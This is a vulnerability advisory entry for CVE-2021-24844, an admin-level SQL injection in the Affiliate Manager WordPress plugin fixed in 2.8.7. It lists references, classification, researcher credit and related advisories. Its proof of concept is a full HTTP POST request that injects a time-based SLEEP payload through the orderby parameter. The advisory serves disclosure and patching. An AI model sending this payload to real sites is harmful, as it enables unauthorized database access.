WordPress Plugin Vulnerabilities

Affiliate Manager < 2.8.7 - Admin+ SQL injection

Description

The plugin does not validate the orderby parameter before using it in an SQL statement in the admin dashboard, leading to an SQL Injection issue

Proof of Concept

POST /wp-admin/admin.php?page=wpam-affiliates&tab=export_data&orderby=if(&order=0,1,SLEEP(10)) HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 149
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

_wpnonce=5e236197e2&wpam-export-affiliates-to-csv=Export+to+CSV

Affects Plugins

Plugin icon
affiliates-manager
Fixed in 2.8.7

References

CVE
CVE-2021-24844
URL
https://blog.szfszf.top/static/papers/affiliates-manager2.8.6_sql_injection_sdgfdgsfdhgdfjfhgreyhftj4634refdhfgh.html
URL
https://plugins.trac.wordpress.org/changeset/2611862/

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
ZhongFu Su(JrXnm) of Wuhan University
Submitter
ZhongFu Su(JrXnm) of Wuhan University
Submitter website
https://blog.szfszf.top
Verified
Yes
WPVDB ID
ebd6d13c-572e-4861-b7d1-a7a87332ce0d

Timeline

Publicly Published
2021-10-11 (about 2 years ago)
Added
2021-10-11 (about 2 years ago)
Last Updated
2022-09-26 (about 1 years ago)

Other

Published
Title
Published
2014-08-01
Title
HTML5 jQuery Audio Player 2.3 - playlist/add_playlist.php id Parameter SQL Injection
Published
2021-07-23
Title
Easy Testimonial Manager <= 1.2.0 - Authenticated SQL Injection
Published
2014-08-01
Title
Finalist - vote.php id Parameter SQL Injection
Published
2023-10-02
Title
Most Popular Posts Widget < 0.9 - Admin+ SQL injection
Published
2023-11-06
Title
Coming Soon < 1.6.0 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')